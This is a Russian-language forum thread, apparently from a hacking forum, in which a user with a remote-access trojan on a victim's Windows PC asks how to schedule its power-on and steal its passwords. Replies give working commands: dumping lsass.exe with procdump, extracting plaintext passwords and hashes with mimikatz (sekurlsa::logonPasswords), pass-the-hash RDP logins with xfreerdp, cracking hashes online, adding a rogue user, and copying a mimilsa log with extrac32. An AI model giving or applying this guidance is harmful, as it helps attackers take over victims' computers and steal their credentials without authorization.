• XSS.stack #1 – первый литературный журнал от юзеров форума

Как через командную строку настроить автозапуск ПК с Windows 10

Отслеживать
Greg77

Greg77

HDD-drive
Пользователь
Регистрация
28.03.2021
Сообщения
27
Реакции
4
Всем привет.
Уважаемые форумчане у меня к вам два вопроса, подскажите пожалуйста, как в windows 10 через командную строку
1) настроить авто-включение пк по расписанию.
2) вытащить дампы паролей пользователей.
Всех кто откликнется заранее благодарю)))
 
Пожалуйста, обратите внимание, что пользователь заблокирован
2) сдампи lsass, и дамп в мимик закинь, он тебе выдаст хеши пользователей, может и пароли, уже залогиненых юзеров
посмотри еще сюда
 
Последнее редактирование:
тут и стоит вопрос. как сдампить через cmd, так как к раб столу нормального доступа нет. Комп или залочен, или на нем работают, или вообще иногда отрубают невовремя. Но на нем стоит мой ратник, поэтому можно удалённо слать команды в cmd, изменять записи реестра, загружать и запускать файл, есть доступ к таск менеджеру.
по этому и думаю. как настроить автовключение когда кх отдыхат, что бы можно было нормально поковыряться. как выключить комп через cmd знаю, а вот как настроить включение по расписанию или вытащить дамп, не знаю((
 
Greg77 сказал(а):
тут и стоит вопрос. как сдампить через cmd, так как к раб столу нормального доступа нет. Комп или залочен, или на нем работают, или вообще иногда отрубают невовремя. Но на нем стоит мой ратник, поэтому можно удалённо слать команды в cmd, изменять записи реестра, загружать и запускать файл, есть доступ к таск менеджеру.
по этому и думаю. как настроить автовключение когда кх отдыхат, что бы можно было нормально поковыряться. как выключить комп через cmd знаю, а вот как настроить включение по расписанию или вытащить дамп, не знаю((
Качаешь программу procdump.exe , загружаешь ее на пк чужой,
потом открываешь cmd на удаленной тачке, заходишь в папку куда закинул procdump
и выполняешь команду:
Код: 
procdump.exe --accepteula -ma lsass.exe lsass.dmp
В случае успеха на удаленной тачке будет создан lsass.dmp файл.
Качаем mimikatz.exe
Копируем его на свой комп рядом с mimikatz.exe
Открываем мимик и делаем в нем:
sekurlsa::minidump lsass.dmp
privilege::debug
log 1234.txt
sekurlsa::logonPasswords full
если все гуд получишь открытые пароли.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
cutedemon сказал(а):
если все гуд получишь открытые пароли.
Если будут только хеши, через хеш можно с помощью xfreerdp в удаленный рабочий стол подключиться.
Или проверить хеши в онлайн сервисах типа crackmd5 или побрутить.
Ты можешь создать нового юзера если у тебя есть cmd и зайти из под него
 
Greg77 сказал(а):
1) настроить авто-включение пк по расписанию.
Типо так что ли тыц
wink.png

Greg77 сказал(а):
2) вытащить дампы паролей пользователей.


Dumping RDP Credentials


файлы тыц


тыц и тыц
wink.png
этой копируем куда надо ваш лог.
Код: 
extrac32.exe /C C:\Windows\System32\mimilsa.log C:\test\mimilsa.log
 
cutedemon сказал(а):
Качаешь программу procdump.exe , загружаешь ее на пк чужой,
потом открываешь cmd на удаленной тачке, заходишь в папку куда закинул procdump
и выполняешь команду:
Код: 
procdump.exe --accepteula -ma lsass.exe lsass.dmp
В случае успеха на удаленной тачке будет создан lsass.dmp файл.
Качаем mimikatz.exe
Копируем его на свой комп рядом с mimikatz.exe
Открываем мимик и делаем в нем:
sekurlsa::minidump lsass.dmp
privilege::debug
log 1234.txt
sekurlsa::logonPasswords full
если все гуд получишь открытые пароли.
Screenshot_1.png

вроде все сделал правильно. выдает (null) хотя просит пароль для входа.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
если тебе нужно войти как по rdp, юзай xfreerdp и вместо пароля поставь нтлм хеш
 
Greg77 сказал(а):
Посмотреть вложение 28561
вроде все сделал правильно. выдает (null) хотя просит пароль для входа.

После перезагрузки и ввода пароля должно сохранить пароль в открытом виде, после этого делай дамп еще раз, и суй в мимик , должно помочь)

romero_4h правильно говорит, зайди по rdp, юзай xfreerdp и вместо пароля поставь нтлм хеш)
Просто не понятно что ты хочешь от этой машины, конкретнее расскажи что тебе нужно от нее​

 
Последнее редактирование:
к кх вхожу через vnc и упираюсь в пасс на входе. ранее подгрузил туда ратник и через него сделал как ты рекомендовал выше. результат выдало пасс null. от машины хочу узнать пасс для входа и настроить автовключение в удобное время для работы время...
 
Greg77 сказал(а):
буду пробовать дальше.
Скорее всего если это домашний пк , нечего не выйдет, не на всех материнских платах есть такой функционал, ну почитай тут ТЫК- может поможет)
 
cutedemon сказал(а):
Скорее всего если это домашний пк , нечего не выйдет, не на всех материнских платах есть такой функционал, ну почитай тут ТЫК- может поможет)
так и не получилось по итогу, грешу на то что кх похоже всего входит удаленно.
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх